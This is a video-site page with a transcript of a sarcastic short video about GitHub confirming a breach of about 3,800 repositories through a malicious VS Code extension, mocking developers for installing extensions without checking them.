Software supply chain attacks exploit trust in legitimate platforms and extensions, where attackers can compromise thousands of repositories by distributing malicious code through trusted channels like marketplace extensions, demonstrating that even well-established platforms and extensions can be vulnerable if users install software without proper verification.
安装我们的扩展,即时搜索任意视频内容
GitHub confirms breach of 3,800 repos via malicious VSCode extension本站添加:
Oh, look, another day, another breach.
GitHub just confirmed that nearly 4,000 repositories got compromised through a malicious VS Code [music] extension.
You know, that little text editor you trusted because everyone on Twitter said it was fine.
Here's the beautiful irony.
Developers spend all day lecturing us about security best practices [music] while casually installing random extensions from the marketplace like they're browsing a sketchy app store in 2009.
And apparently, one of those extensions decided to help [music] itself to some valuable source code and credentials.
The extension, naturally, looked legitimate enough to fool thousands [music] of people.
It probably had a nice description, some stars, maybe even a couple of fake reviews.
The attacker basically walked in through the front door while everyone was too busy optimizing their Vim configuration to notice.
>> [music] >> What makes this particularly delicious is that this is the open source community we're talking about.
The people who invented supply chain security in [music] response to previous disasters.
And yet here we are again, watching the exact same movie with slightly different [music] actors.
GitHub has since removed the extension and they're doing the whole responsible disclosure dance, but the damage is already done.
Your private [music] keys, your API tokens, your unpublished code, it's all probably sitting in some attacker's database right now, and there's not much you can do about it except change literally everything.
The lesson [music] here, if you even need one, is that trust is a currency we spend too freely in tech.
We see a few downloads and [music] some decent marketing, and suddenly we're running arbitrary code on our machines without a second thought.
Link in bio for the full overfitted breakdown.
相关推荐
Agentforce NOW AMA: Build with React and Salesforce Multi-Framework
SalesforceDevs
490 views•2026-05-28
How agent o11y differs from traditional o11y — Phil Hetzel, Braintrust
aiDotEngineer
450 views•2026-05-28
Re: 🗣️📍theprophedu📍2026 GST 103 CLASS (E-EXAM REVISION)
theprophedu
636 views•2026-06-04
WEB TECHNOLOGIES UNIT-2 | Degree 4th sem BCOM Computers web technologies unit-2 full explanation💯✅
LearnwithSahera
1K views•2026-05-29
More tests are always better? How to use AI to identify tests that bring little value
Alliance4Qualification
335 views•2026-05-29
Search Algorithms Explained in 60 Seconds! 🤖💨
samarthtuliofficial
218 views•2026-06-01
People of Game of Thrones using JavaScript DOM
AltCampus
296 views•2026-05-30
Instagram accounts got PWNed
EricParker
13K views•2026-06-03
